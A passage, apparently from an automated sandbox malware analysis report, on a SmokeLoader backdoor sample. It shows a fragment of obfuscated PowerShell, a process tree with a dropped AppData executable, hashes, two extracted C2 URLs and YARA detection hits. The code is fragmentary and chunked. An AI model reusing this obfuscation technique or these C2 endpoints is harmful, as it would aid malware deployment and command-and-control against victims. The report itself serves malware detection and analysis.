I,PuIdesat ivado'+'Pu I,PuIdesat ivadoPuI,P uIdesativa doPuI,PuId esativadoP uI,PuIdesa tivadoPuI, PuI1PuI,Pu Idesativad oPuI));'). rEPlaCE('P uI',[StrIn G][CHAR]39 ).rEPlaCE( '2pO','|') .rEPlaCE(' seY','$')| . ((gV '* Mdr*').nAm E[3,11,2]- jOIN'')" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - aspnet_compiler.exe (PID: 3964 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\asp net_compil er.exe" MD5: A1CC6D0A95AA5C113FA52BEA08847010)
- taskeng.exe (PID: 4052 cmdline:
taskeng.ex e {D690A31 F-6F9A-4F5 C-9D7D-F0E C28BCB101} S-1-5-21- 966771315- 3019405637 -367336477 -1006:user -PC\user:I nteractive :[1] MD5: 65EA57712340C09B1B0C427B4848AE05) - vtjrhji (PID: 3728 cmdline:
C:\Users\u ser\AppDat a\Roaming\ vtjrhji MD5: A1CC6D0A95AA5C113FA52BEA08847010)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| SmokeLoader | The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body. |
{"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| Windows_Trojan_Smokeloader_4e31426e | unknown | unknown |
| |
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| Windows_Trojan_Smokeloader_4e31426e | unknown | unknown |
| |
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security | ||
| Windows_Trojan_Smokeloader_4e31426e | unknown | unknown |
| |
| Click to see the 4 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||